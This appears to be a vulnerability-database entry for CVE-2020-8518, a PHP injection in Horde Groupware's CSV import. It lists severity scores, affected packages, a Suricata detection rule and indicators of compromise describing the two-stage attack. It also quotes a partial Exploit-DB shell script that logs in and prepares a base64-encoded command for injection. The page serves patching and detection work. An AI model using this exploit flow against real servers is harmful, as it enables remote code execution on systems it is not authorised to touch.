CVE-2020-8518
Published 2020-02-17

Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.

Priority: P1 · 82 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available (see the Exploit-DB and Metasploit entries below)
EPSS: 71.14% (99.3rd percentile)
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | php-horde-data | < php-horde-data 2.1.5-1 (bookworm) | php-horde-data 2.1.5-1 (bookworm) |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| horde | groupware | — | — |
Detection & IOCs (extracted from sources)

Snort/Suricata rule:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Possible CVE-2020-8518 (Horde Groupware RCE)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"data.php"; endswith; http.request_body; content:"|22 3b 20|filename=|22|"; content:"|2e|passthru|28|"; content:"|2e|die|28 29 3b|"; distance:0; http.header_names; content:"horde_secret_key|0d 0a|"; nocase; fast_pattern; reference:url,cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/; reference:cve,2020-8518; classtype:attempted-admin; sid:2029636; rev:3; metadata:attack_target Web_Server, created_at 2020_03_13, cve CVE_2020_8518, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_11_07;)

- The exploit sends a POST to /mnemo/data.php with actionID=11 and import_format=csv to upload a dummy file, followed by a second POST with actionID=3, import_step=2, and a crafted 'quote' parameter containing injected PHP (passthru/base64_decode/die) to trigger RCE.
- The injected PHP payload is base64-encoded and passed via the 'quote' POST parameter; look for base64-encoded strings in the 'quote' field of CSV import requests to /mnemo/data.php.
- The exploit requires prior authentication; monitor for login attempts to /login.php with horde_user/horde_pass POST parameters followed immediately by requests to /mnemo/data.php.
- The Emerging Threats Snort/Suricata rule (SID 2029636) detects this exploit by matching a POST to a URI ending in data.php, with a request body containing the byte sequences for '; filename="', '.passthru(', and '.die();', plus the horde_secret_key header.
- The two-stage attack first uploads a dummy file (actionID=11, import_step=1) to establish a session context, then injects PHP in the second request (actionID=3, import_step=2); both stages should be correlated for high-confidence detection.
- The vulnerability is present in Horde_Data module version 2.1.4 and earlier; the fix is in version 2.1.5. Debian packages resolved this in version 2.1.5-1 across bookworm, bullseye, and sid.
- Exploitation requires valid credentials; unauthenticated attackers cannot directly exploit this vulnerability.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | CRITICAL | — |
GHSA
GHSA-v54x-qq77-866f: Horde Groupware Webmail Edition 5
ghsa (unreviewed) · 2022-05-24
CVE-2020-8518 [HIGH] CWE-94 GHSA-v54x-qq77-866f: Horde Groupware Webmail Edition 5
Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.
OSV
CVE-2020-8518: Horde Groupware Webmail Edition 5
osv·2020-02-17·CVSS 9.8
CVE-2020-8518 [CRITICAL] CVE-2020-8518: Horde Groupware Webmail Edition 5
Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.
Debian
CVE-2020-8518: php-horde-data - Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code vi...
vendor_debian·2020·CVSS 9.8
CVE-2020-8518 [CRITICAL] CVE-2020-8518: php-horde-data - Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code vi...
Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.
Scope: local
bookworm: resolved (fixed in 2.1.5-1)
bullseye: resolved (fixed in 2.1.5-1)
sid: resolved (fixed in 2.1.5-1)
Suricata
ET WEB_SPECIFIC_APPS Possible CVE-2020-8518 (Horde Groupware RCE)
suricata·2020-03-13·CVSS 9.8
CVE-2020-8518 [CRITICAL] ET WEB_SPECIFIC_APPS Possible CVE-2020-8518 (Horde Groupware RCE)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Possible CVE-2020-8518 (Horde Groupware RCE)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"data.php"; endswith; http.request_body; content:"|22 3b 20|filename=|22|"; content:"|2e|passthru|28|"; content:"|2e|die|28 29 3b|"; distance:0; http.header_names; content:"horde_secret_key|0d 0a|"; nocase; fast_pattern; reference:url,cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/; reference:cve,2020-8518; classtype:attempted-admin; sid:2029636; rev:3; metadata:attack_target Web_Server, created_at 2020_03_13, cve CVE_2020_8518, deployment Perimeter, performance_impact Low, conf
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution
exploitdb·2020-03-10
CVE-2020-8518 Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution
---
```sh
#!/bin/sh
if [ "$#" -ne 4 ]; then
    echo '[!] Usage: ' 1>&2
    exit 1
fi
BASE="$1"
USERNAME="$2"
PASSWORD="$3"
COMMAND="$4"
JAR="$(mktemp)"
trap 'rm -f "$JAR"' EXIT
echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2
curl -si -c "$JAR" "$BASE/login.php" \
    -d 'login_post=1' \
    -d "horde_user=$USERNAME" \
    -d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \
    echo '[!] Cannot log in' 1>&2
echo "[+] Uploading dummy file" 1>&2
echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \
    -F 'actionID=11' \
    -F 'import_step=1' \
    -F 'import_format=csv' \
    -F 'notepad_target=x' \
    -F 'import_file=@-;filename=x' \
    -so /dev/null
echo "[+] Running command" 1>&2
BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)"
curl -b "$JA
```
Metasploit
Horde CSV import arbitrary PHP code execution
metasploit
The Horde_Data module version 2.1.4 (and before) present in Horde Groupware version 5.2.22 allows authenticated users to inject arbitrary PHP code thus achieving RCE on the server hosting the web application.
No writeups or analysis indexed.
References

- http://packetstormsecurity.com/files/156872/Horde-5.2.22-CSV-Import-Code-Execution.html
- https://lists.debian.org/debian-lts-announce/2020/04/msg00008.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2PRPIFQDGYPQ3F2TF2ETPIL7IYNSVVZQ/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKTNYDBDVJNMVC7QPXQI7CMPLX3USZ2T/
- https://lists.horde.org/archives/announce/2020/001285.html